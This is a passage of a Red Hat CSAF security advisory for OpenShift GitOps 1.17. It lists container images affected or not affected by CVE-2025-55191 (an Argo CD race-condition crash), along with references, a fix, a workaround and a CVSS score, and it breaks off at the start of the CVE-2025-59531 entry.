"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-55191"
},
{
"category": "external",
"summary": "RHBZ#2400562",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400562"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-55191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55191"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-55191",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55191"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/commit/701bc50d01c752cad96185f848088d287a97c7b7",
"url": "https://github.com/argoproj/argo-cd/commit/701bc50d01c752cad96185f848088d287a97c7b7"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/pull/6103",
"url": "https://github.com/argoproj/argo-cd/pull/6103"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-g88p-r42r-ppp9",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-g88p-r42r-ppp9"
}
],
"release_date": "2025-09-30T22:52:19.838000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-09T18:48:05+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:17731"
},
{
"category": "workaround",
"details": "Systems may be configured to automatically restart a service upon crash and doing so may partially mitigate the availability impact of this vulnerability.",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "github.com/argoproj/argo-cd/v2: github.com/argoproj/argo-cd/v3: Argo CD race condition leading to crash"
},
{
"cve": "CVE-2025-59531",
"cwe": {
"id": "CWE-248",
"name": "Uncaught Exception"
},
"discovery_date": "2025-10-01T21:03:46.509567+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
